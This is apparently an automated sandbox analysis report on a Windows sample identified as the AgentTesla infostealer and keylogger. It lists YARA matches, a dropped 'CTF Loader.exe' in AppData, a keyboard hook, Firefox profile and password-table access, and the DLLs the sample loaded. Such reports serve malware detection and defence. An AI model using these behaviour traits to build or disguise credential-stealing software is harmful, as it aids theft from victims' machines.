Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe			Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: ZOYGRL1ePa.exe PID: 6972, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: CTF Loader.exe PID: 2756, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: AgentTesla Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Yara detected AgentTesla

Source: Yara match	File source: Process Memory Space: ZOYGRL1ePa.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CTF Loader.exe PID: 2756, type: MEMORYSTR
Source: Yara match	File source: ZOYGRL1ePa.exe, type: SAMPLE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013B8900	0_2_013B8900
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013BEB37	0_2_013BEB37
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013B7CE8	0_2_013B7CE8
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013B8030	0_2_013B8030
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013B5370	0_2_013B5370
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013BDDF9	0_2_013BDDF9
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_013BDE08	0_2_013BDE08
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E74D60	0_2_06E74D60
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E7E2D0	0_2_06E7E2D0
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E7C840	0_2_06E7C840
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E75848	0_2_06E75848
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E74D50	0_2_06E74D50
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E70040	0_2_06E70040
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E7C830	0_2_06E7C830
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E7003F	0_2_06E7003F
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E75839	0_2_06E75839
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E779C0	0_2_06E779C0
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06E779D0	0_2_06E779D0
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06FCBA91	0_2_06FCBA91
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06FC6550	0_2_06FC6550
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_07110040	0_2_07110040
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_0711A1FF	0_2_0711A1FF
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_07608420	0_2_07608420
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_07608411	0_2_07608411
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_007752F1	4_2_007752F1
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_007752F8	4_2_007752F8
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BB8900	4_2_00BB8900
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BBEB3D	4_2_00BBEB3D
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BB7CE8	4_2_00BB7CE8
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BB8030	4_2_00BB8030
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BB5370	4_2_00BB5370
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BBDDF9	4_2_00BBDDF9
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00BBDE08	4_2_00BBDE08
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FCB640	4_2_05FCB640
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FCB008	4_2_05FCB008
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC9EA8	4_2_05FC9EA8
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC3BE0	4_2_05FC3BE0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC4031	4_2_05FC4031
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC3FE7	4_2_05FC3FE7
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC3E9C	4_2_05FC3E9C
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC3BD1	4_2_05FC3BD1
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D4D55	4_2_065D4D55
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065DE2D0	4_2_065DE2D0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D5848	4_2_065D5848
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065DC840	4_2_065DC840
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D0040	4_2_065D0040
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D001E	4_2_065D001E
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D5839	4_2_065D5839
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065DC831	4_2_065DC831
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D79D0	4_2_065D79D0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_065D79C0	4_2_065D79C0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_067DA208	4_2_067DA208
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_067D0040	4_2_067D0040
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_067DA150	4_2_067DA150
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_01728900	5_2_01728900
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_0172D5EC	5_2_0172D5EC
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_01727CE8	5_2_01727CE8
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_01728030	5_2_01728030
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_0172EAF1	5_2_0172EAF1
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_01725370	5_2_01725370
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_0172D5E0	5_2_0172D5E0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_0172DDF9	5_2_0172DDF9
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_0172DE08	5_2_0172DE08
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_06C93BE0	5_2_06C93BE0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_06C93E9C	5_2_06C93E9C
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_06C937CC	5_2_06C937CC
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_06C93FE7	5_2_06C93FE7
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_06C938B0	5_2_06C938B0
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 5_2_06C94031	5_2_06C94031

Source: ZOYGRL1ePa.exe, 00000000.00000002.4112081547.000000000119E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe, 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe, 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefirefox_f4.exe4 vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe, 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameZWFCTULIFEJSVRXLECMXBNOCDPQMEGPQMUTJOXTI.exe4 vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe, 00000000.00000002.4111832397.0000000000EF8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe	Binary or memory string: OriginalFilenameIELibrary.dll4 vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe	Binary or memory string: OriginalFilenamefirefox_f4.exe4 vs ZOYGRL1ePa.exe
Source: ZOYGRL1ePa.exe	Binary or memory string: OriginalFilenameZWFCTULIFEJSVRXLECMXBNOCDPQMEGPQMUTJOXTI.exe4 vs ZOYGRL1ePa.exe

Source: ZOYGRL1ePa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: ZOYGRL1ePa.exe, type: SAMPLE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: ZOYGRL1ePa.exe PID: 6972, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: Process Memory Space: CTF Loader.exe PID: 2756, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: ZOYGRL1ePa.exe, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZOYGRL1ePa.exe, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, FD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CTF Loader.exe.0.dr, JA.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@3/3@2/2

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

File created: C:\Users\user\AppData\Roaming\CTF Loader

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Mutant created: NULL

Source: ZOYGRL1ePa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ZOYGRL1ePa.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003005000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003015000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003023000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZOYGRL1ePa.exe	ReversingLabs: Detection: 84%
Source: ZOYGRL1ePa.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

File read: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZOYGRL1ePa.exe "C:\Users\user\Desktop\ZOYGRL1ePa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe "C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe "C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe"

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: ksuser.dll	Jump to behavior
